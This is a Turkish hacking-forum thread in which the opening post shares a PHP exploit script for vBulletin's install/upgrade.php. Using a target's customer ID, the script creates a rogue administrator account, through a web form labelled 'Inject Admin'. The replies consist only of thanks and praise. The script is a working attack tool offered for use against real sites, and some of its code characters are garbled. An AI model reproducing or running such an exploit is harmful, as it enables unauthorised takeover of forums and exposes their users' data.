Konuyu Oyla:
  • Toplam: 0 Oy - Ortalama: 0
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: vBulletin 4.1.x /5.x.x Upade 0day Exploit
#H4CK4L
*
avatar
#R00T
Durum: Çevrimdışı
Seviye Puanı: 43
Yaşam Puanı: 1,050 / 1,050
Deneyim: 3 / 100
Rep Sayısı: 1042
Mesaj Sayısı: 2999
Üyelik Tarihi: 04.05.2013
      
Yorum: #1
vBulletin 4.1.x /5.x.x Upade 0day Exploit
07.01.2014 18:47
Kullanım videosu ;




PHP Kod:
<code><h1>vBulletin 4.1.5.x.x   Upgrade   0day Exploit</h1>
<
p>Created byBoxhead</p>
<
p>Found on08/22/2013</p>
<
p>Website: <a href"http://belegit.net" target="_blank">http://belegit.net</a></p>
<br>
<?
php
//extract data from the post
if(isset($_POST[’submit’])){
extract($_POST);

//set POST variables
$url $_POST[’url’];
$fields = array(
                              
’ajax’ => urlencode(’1’),
                              
’version’ => urlencode(’install’),
                              
’checktable’ => urlencode(’false’),
                              
’firstrun’ => urlencode(’false’),
                              
’step’ => urlencode(’7’),
                              
’startat’ => urlencode(’0’),
                              
’only’ => urlencode(’false’),
                              
’customerid’ => urlencode($_POST[’customerid’]),
                              
’options[skiptemplatemerge]’ => urlencode(’0’),
                              
’response’ => urlencode(’yes’),
                              
’htmlsubmit’ => urlencode(’1’),
                              
’htmldata[username]’ => urlencode($_POST[’username’]),
                              
’htmldata[password]’ => urlencode($_POST[’password’]),
                              
’htmldata[confirmpassword]’ => urlencode($_POST[’password’]),
                              
’htmldata[email]’ => urlencode($_POST[’email’])
                    );

//url-ify the data for the POST
foreach($fields as $key=>$value) { $fields_string .= $key.=.$value.&; }
rtrim($fields_string&);

//open connection
$ch curl_init();

//set the url, number of POST vars, POST data
curl_setopt($ch,CURLOPT_URL$url);
curl_setopt($ch,CURLOPT_POSTcount($fields));
curl_setopt($ch,CURLOPT_POSTFIELDS$fields_string);
curl_setopt($chCURLOPT_COOKIESESSIONTRUE);
curl_setopt($chCURLOPT_COOKIE’bbcustomerid=.$_POST[’customerid’] );

//execute post
$result curl_exec($ch);

//close connection
curl_close($ch);
exit();
}
?>
<center>
<form name="sploit" method="POST" action="<?php echo $_SERVER[’REQUEST_URI’]; ?>">
<span>Example:http://test.com/forum/install/upgrade.php</span><br>
<span>Website:</span>
    <input name="url" type="text" tabindex="1" size="60" />
    <br>
    <span>Customer ID:</span>
    <input name="customerid" type="text" tabindex="2" size="40" />
    <br>
    <span>Username:</span>
    <input name="username" type="text" tabindex="3" size="40" />
    <br>
    <span>Password:</span>
    <input name="password" type="text" tabindex="4" size="40" />
    <br>
    <span>Email:</span>
    <input name="email" type="text" tabindex="5" maxlength="40" />
    
<input name="submit" type="submit" value="Inject Admin">
</form>
</center>      </code> 


Konu Sahibi: Scarface

Çocukken her akşam yatmadan önce Tanrı'ya bana bir bisiklet vermesi için dua ederdim. Bir gün Tanrı'nın çalışma tarzının bu olmadığını anladım. Ertesi gün gittim kendime yeni bir bisiklet çaldım ve her akşam yatmadan önce Tanrı'ya günahlarımı affetmesi için dua ettim.
Alinti
Mentalistler
*
avatar
Sivile Alındı
Durum: Çevrimdışı
Seviye Puanı: 25
Yaşam Puanı: 255 / 608
Deneyim: 35 / 100
Rep Sayısı: 190
Mesaj Sayısı: 792
Üyelik Tarihi: 02.10.2013
     
Yorum: #2
Cvp: vBulletin 4.1.x /5.x.x Upade 0day Exploit
07.01.2014 19:10
abim helal olsun vallaha Exciting güzel teknik Exciting
Alinti
DaRKNeSS
*
avatar
Binbaşı
Durum: Çevrimdışı
Seviye Puanı: 53
Yaşam Puanı: 1,315 / 1,315
Deneyim: 60 / 100
Rep Sayısı: 121
Mesaj Sayısı: 5584
Üyelik Tarihi: 11.08.2013
     
Yorum: #3
Cvp: vBulletin 4.1.x /5.x.x Upade 0day Exploit
07.01.2014 19:18
Eline Sağlık Abi Exciting


Alinti
Trafalgar Law
*
avatar
Yüzbaşı
Durum: Çevrimdışı
Seviye Puanı: 6
Yaşam Puanı: 4 / 138
Deneyim: 55 / 100
Rep Sayısı: 1
Mesaj Sayısı: 59
Üyelik Tarihi: 04.01.2014
     
Yorum: #4
Cvp: vBulletin 4.1.x /5.x.x Upade 0day Exploit
07.01.2014 19:59
Mükemmel olmuş

Kovaladığımız hayaller ve bizi kovalayan gerçekler her zaman paralel; asla kesişmiyorlar.
Alinti
[email protected]
avatar
Kondom Mağduru
Durum: Çevrimdışı
Seviye Puanı: 26
Yaşam Puanı: 272 / 633
Deneyim: 33 / 100
Rep Sayısı: 123
Mesaj Sayısı: 865
Üyelik Tarihi: 05.05.2013
     
Yorum: #5
Cvp: vBulletin 4.1.x /5.x.x Upade 0day Exploit
07.01.2014 20:08
İşte ben böyle konulara hasretim.
Alinti



1 Ziyaretçi